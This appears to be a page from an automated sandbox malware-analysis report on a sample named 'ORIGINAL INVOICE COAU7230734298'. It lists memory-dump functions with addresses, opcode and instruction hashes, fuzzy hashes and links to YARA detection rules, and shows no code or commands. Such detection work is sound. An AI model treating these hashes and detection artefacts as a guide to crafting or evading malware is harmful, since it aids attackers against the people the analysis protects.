                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 88cf72581d478f062258874f636ada640c3970aa20b0a9d5c092cb5aba000d72
                                  • Instruction ID: eaa4081324d2a27761d17b4377f1f5e8d475ca4012efd5d0d26172fd34edd905
                                  • Opcode Fuzzy Hash: 88cf72581d478f062258874f636ada640c3970aa20b0a9d5c092cb5aba000d72
                                  • Instruction Fuzzy Hash: B7018F71E0020AEFCB04DFA9D541AAEB7F8FF58300F10802AF904E7351D674AA00CBA0
                                  Function 01A4CA6F Relevance: .0, Instructions: 42COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                  • Instruction ID: 83dadf603a864008cb18faf378b220433883cccec875ed2a075dce6dbc9bd474
                                  • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                  • Instruction Fuzzy Hash: 1601F4322016859BE722A71DC905F59BFE9EF81760F0C84B5FA088B6A2DA7CC840C210
                                  Function 01AE61E5 Relevance: .0, Instructions: 41COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8e81749125be6f61581b54006ceea660083e3442fc35f06df2ba4fbee0043271
                                  • Instruction ID: acf9d99e5cb9bd5488c3261f97531cdf528526e0143c64b4e95d9d865bc4c79c
                                  • Opcode Fuzzy Hash: 8e81749125be6f61581b54006ceea660083e3442fc35f06df2ba4fbee0043271
                                  • Instruction Fuzzy Hash: C6014F71E002599BDF04DFA9D545AEEBBF8BF58310F14405AE905A7280D774EA01CB94
                                  Function 01A963C0 Relevance: .0, Instructions: 41COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                  • Instruction ID: 245470e6fbab471d31f928a0bedecc6eff7a20be82871efb4376efe9ccaa1765
                                  • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                  • Instruction Fuzzy Hash: B5F0127210001DBFEF019F94DE80DAF7BBDEF592E8B114125FA1596160D635DD21A7A0
                                  Function 01A9A4B0 Relevance: .0, Instructions: 40COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 720dc820cf8498cdc1b873380af1b85cfcfdf1dc7fbff1c793ec1cef43ce1bce
                                  • Instruction ID: b9602ae68f275d80d579dbcdb243d3a5a5755b37b92786ab67b1e69d4dc450c0
                                  • Opcode Fuzzy Hash: 720dc820cf8498cdc1b873380af1b85cfcfdf1dc7fbff1c793ec1cef43ce1bce
                                  • Instruction Fuzzy Hash: ED018936200109ABCF129F94D840EDA3FA6FB4C764F068102FE1966220C332D9B0EF81
                                  Function 01A0C0F0 Relevance: .0, Instructions: 39COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2d97ee6e5704b612ef589b128c6aca70591c1319fb99f646b526be941d812574
                                  • Instruction ID: 39d1dc0226132627f1657fdfb6d28139b42769c40a8ccc326a65730d8b55cffb
                                  • Opcode Fuzzy Hash: 2d97ee6e5704b612ef589b128c6aca70591c1319fb99f646b526be941d812574
                                  • Instruction Fuzzy Hash: 9AF0F0712043415BF2169659EC01B2272EAE7C0760F2980AAEB098B2C9EA70D8018295
                                  Function 01A4656A Relevance: .0, Instructions: 39COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 96924e995fac62c5745a471b826aa029b7b1a21386085b8c55a130091562547d
                                  • Instruction ID: 6aebaa1373e883621e261f0f23c3c2694e24785d322301ea2f8d64f0308a980f
                                  • Opcode Fuzzy Hash: 96924e995fac62c5745a471b826aa029b7b1a21386085b8c55a130091562547d
                                  • Instruction Fuzzy Hash: C2014470604682DBF732A77CCE48F2537A8FB95B44F4C4591FA058BAD6D768D8418611
                                  Function 01AB437C Relevance: .0, Instructions: 37COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                  • Instruction ID: 12fe46fa6458aaf0ae49d50d3432a7703263907d3576424ecb3bc7e33f9eda05
                                  • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                  • Instruction Fuzzy Hash: 9BF0E931747F9347E735AB2D8590B6EA65DAFD4D40B0D052C9503CB643DF21D8009790
                                  Function 01A9C89D Relevance: .0, Instructions: 36COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cbf06cd874abc7b69f24664c2cb56b00b5627754a1a022d3b121308cb6d22ed7
                                  • Instruction ID: dac9d66bc8253d703bd83555a20d3ed5299965a353f43ba07ba88b49e599d90e
                                  • Opcode Fuzzy Hash: cbf06cd874abc7b69f24664c2cb56b00b5627754a1a022d3b121308cb6d22ed7
                                  • Instruction Fuzzy Hash: 3DF0AF706097049FC754EF28C541A2BB7E4FF98720F40865ABC98DB394E634E901C796
                                  Function 01A9E872 Relevance: .0, Instructions: 36COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                  • Instruction ID: 5a7e2545f0105c5ccea4cde1ca334cd9c205fa7ed7afaddd5f667e015f91042f
                                  • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                  • Instruction Fuzzy Hash: A1F054337115619BDB22DF8DCC80F16B7F8AFD9A60F1D4065A6049F662C760EC8187D0
                                  Function 01A40854 Relevance: .0, Instructions: 35COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                  • Instruction ID: 328f8d021814f5878d107478f44534f0b353585bd6ca23e824761f8b0e886a46
                                  • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                  • Instruction Fuzzy Hash: 9BF0B472610204AFE715DF25CE01F96B6E9EFD8340F158078A645D71A0FAB1DD11DA54
                                  Function 01A9C912 Relevance: .0, Instructions: 34COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a40781cc5138105e7bb680e5d859c5dcd3a2332e603a26afa80c4956f3c32d8d
                                  • Instruction ID: b6a454b002d9d3d383bfb79116fa8ce55045641aaf5acf05525ee45f7a209e60
                                  • Opcode Fuzzy Hash: a40781cc5138105e7bb680e5d859c5dcd3a2332e603a26afa80c4956f3c32d8d
                                  • Instruction Fuzzy Hash: 35F04F74A012499FCB14EF69D655A6EB7F4EF58300F108055A955EB385DA38EA01CB50
                                  Function 01A147FB Relevance: .0, Instructions: 33COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1e95f4f5a55b758e264c19d5bde76796c5b7e855db3f789a4b0c5ea8da23f797
                                  • Instruction ID: a3755e21b0e5b43bfcec8d0cbe69a3e2b7680f0eab4e9d0d44642857d7d8d20c
                                  • Opcode Fuzzy Hash: 1e95f4f5a55b758e264c19d5bde76796c5b7e855db3f789a4b0c5ea8da23f797
                                  • Instruction Fuzzy Hash: 18F0E2319167E19FE733DB6CC148B61BBD89B0C730F08897ADD8987546C734D880C654
                                  Function 01AD0115 Relevance: .0, Instructions: 32COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 748d71d7b0ad977c6a37dedfa752a5f95a67f7ab596b4fd49e50fa4bb91080f2
                                  • Instruction ID: 8db9ca02045c420f475dc937af756c9aa8500fe65616df03e9eb47c123f4a986
                                  • Opcode Fuzzy Hash: 748d71d7b0ad977c6a37dedfa752a5f95a67f7ab596b4fd49e50fa4bb91080f2
                                  • Instruction Fuzzy Hash: 0AF0A06641AB814ECB336B3C6A943D16FA5A7A9610F191489F8A267606CA748893C364
                                  Function 01A4C5ED Relevance: .0, Instructions: 31COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f39b1e6bec0f143c5bea1213b2ec18592ad098a5aa75bea29dffbfb88ac334e2
                                  • Instruction ID: a15fc4eddce7ce099f973e385f01e06b16d38dd79bf48b6e8e851646633d5d54
                                  • Opcode Fuzzy Hash: f39b1e6bec0f143c5bea1213b2ec18592ad098a5aa75bea29dffbfb88ac334e2
                                  • Instruction Fuzzy Hash: C6F0E2715136919FE3229B1CC148B61FBE8AB847B0F09F535D40EC7526C670E880CA50
                                  Function 01A52619 Relevance: .0, Instructions: 31COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                  • Instruction ID: d6db370e5f1f41c997acc202fc3291c7eed8d7a61866eb4e378d91205ef474d3
                                  • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                  • Instruction Fuzzy Hash: 28E092723006016BE7519E598D80F57776EEF92B10F04047AB9045E251CAE29C0982A4
                                  Function 01AA6030 Relevance: .0, Instructions: 29COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                  • Instruction ID: 237350b12f7e5ea7fc062f237756deb900800c08ff8ed6f440d81a3160ce213f
                                  • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                  • Instruction Fuzzy Hash: 07F030B21446049FE3218F09D944F92B7F8EB05375F89C025E6099B561D379EC80CFA4
                                  Function 01A10710 Relevance: .0, Instructions: 28COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                  • Instruction ID: 20be1b8662083126ea19481928bce8601b1913eb4a6cb93d08671db538a5a580
                                  • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                  • Instruction Fuzzy Hash: ECF0E5392047459BDB16DF1AC140AA57BB8FB45350B044454F8428B301D731E981CB94
                                  Function 01A449D0 Relevance: .0, Instructions: 28COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                  • Instruction ID: eb8825b36019789c549588dc41a0b56fda0b831936f2e182c2054b3ccb29adbe
                                  • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                  • Instruction Fuzzy Hash: 04E0DF32244685AFD3212E598800B6ABFAAEBD87A0F1A0439E2008B250DF70DC40C7E8
                                  Function 01AE4164 Relevance: .0, Instructions: 27COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e076e6b5719407332b7f147a1e2153286055811fc9b27597916e26553941242c
                                  • Instruction ID: d1ad1253eea09835588e870080251a876d3a906823ee0c973174227dbba5e114
                                  • Opcode Fuzzy Hash: e076e6b5719407332b7f147a1e2153286055811fc9b27597916e26553941242c
                                  • Instruction Fuzzy Hash: 35F02231A26BA18FEB73D72CE28CF5277E8AF98670F0A05A4D404C7912C334EC80C650
                                  Function 01AB678E Relevance: .0, Instructions: 27COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                  • Instruction ID: 629ec2714bf1b0cc9e84daab547a737d64a90e08ed209492cf03e25166fe28a6
                                  • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                  • Instruction Fuzzy Hash: 0CE0DF73A00520BBDB219B998E01FDABFACEB94EA0F150064B604E7090E530DE00C690
                                  Function 01AE08C0 Relevance: .0, Instructions: 25COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                  • Instruction ID: ceb8b920bd95663e904349b34f0f9d0e62d1bb33ee29cfc456391121db8ad4f7
                                  • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                  • Instruction Fuzzy Hash: 99E09B317403558BCB268B2DC244A53BBE8DF95660F158069E90547612C271F842C6D0
                                  Function 01A125E0 Relevance: .0, Instructions: 23COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 7be3ed4e97f7488def94af6416281359eb3cb4bc36873c80c6370546d337d20b
                                  • Instruction ID: 4eb4dcf89af415d7f8677a93e7c3d01ede36126a600510bea08fa6be6380527c
                                  • Opcode Fuzzy Hash: 7be3ed4e97f7488def94af6416281359eb3cb4bc36873c80c6370546d337d20b
                                  • Instruction Fuzzy Hash: 51E092321005549BC722BF29DE01F9A7B9AEF64360F114515F11557194CB34A810C7C4
                                  Function 01ACA456 Relevance: .0, Instructions: 23COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                  • Instruction ID: 6290bc333354ff65951ad477ca36727485e9f30a641218831fd6855fe115dc34
                                  • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                  • Instruction Fuzzy Hash: 57E0D831010611DFE7366F2ACB08B62BBE0FF90B11F148C2DE09A024B1D7B598C1CA40
                                  Function 01A94000 Relevance: .0, Instructions: 22COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                  • Instruction ID: 2263294390d086629401d37a82895f3a69f7fdd1e2cceb8fc4a286b6ec56807e
                                  • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                  • Instruction Fuzzy Hash: E7E0C2343003058FEB15CF19C180B627BF6BFD9A20F28C068A9488F205EB36E883CB40
                                  Function 01A0823B Relevance: .0, Instructions: 21COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                  • Instruction ID: e5436ed9a67fa96944d319ddc7c63bc9337bd0280568f6840273a5b770a85dd7
                                  • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                  • Instruction Fuzzy Hash: 83E08C31944A20EEDB332F29EE00B5176A5FF6CB20F15482AE082060A4C678A881CA58
                                  Function 01A12050 Relevance: .0, Instructions: 20COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1a505629ba511678877d275d9c1f74c8030a0e60e8a8e5369d7bb820a8631a8e
                                  • Instruction ID: 8b362895364e9a7a8fc5969a18e5e1ee7f8c9cdb3c4cde71fb22f40af8a0a07e
                                  • Opcode Fuzzy Hash: 1a505629ba511678877d275d9c1f74c8030a0e60e8a8e5369d7bb820a8631a8e
                                  • Instruction Fuzzy Hash: 92E08C321004606BC612FE5DDE10F9A779EEFA9360F100121F1508B298CB24AC00C794
                                  Function 01A48A90 Relevance: .0, Instructions: 20COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                  • Instruction ID: c78fa3d42fc8590936dde2c9bee58db3a7e7764eb49c7d574d71d560756ab5e3
                                  • Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
                                  • Instruction Fuzzy Hash: 01E08633511A14C7C728DE58D511B7277A4EF85720F09463EA61347780C574E544C794
                                  Function 01A66AA4 Relevance: .0, Instructions: 17COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                  • Instruction ID: d388bf3d4106f2c7e7e9fe306856cdbff19c1a369674d58608968be7b3e7ca6a
                                  • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                  • Instruction Fuzzy Hash: 03D05E36511A50AFC7329F1BEA00C13BBF9FFD9A20705062EE54583920C670A806CBA0
                                  Function 01A4E59C Relevance: .0, Instructions: 16COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                  • Instruction ID: 97d1452d51f285c6d12a819ea95f2a0ce124155ee95b7f1b3a4ac4adca21c723
                                  • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                  • Instruction Fuzzy Hash: A0D0A932204620ABDB32AA1CFC00FE333E8BB8C720F060459F008C7050C364AC81CA84
                                  Function 01A8E908 Relevance: .0, Instructions: 16COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                  • Instruction ID: b3796bc9bbc70de88bedc02279f17bee77104c8da8f41dd4b9ccd54307914e45
                                  • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                  • Instruction Fuzzy Hash: 99E0EC35950684DBDF17EF59C640F5ABBB9BB95B40F150054A5189B660C664A901CB40
                                  Function 01A0A0E3 Relevance: .0, Instructions: 15COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_19e0000_ORIGINAL INVOICE COAU7230734298.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                  • Instruction ID: 4cfbd2b51a944643e670fde48ddc8d601727aa46ffc17b2f2cc03a861b1e4b64
                                  • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                  • Instruction Fuzzy Hash: 93D02232312130A3CF2A9B597900F636915AF85BA0F0A002C740A93840C0088C42C2E0
                                  Function 01A4A830 Relevance: .0, Instructions: 14COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2241237818.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
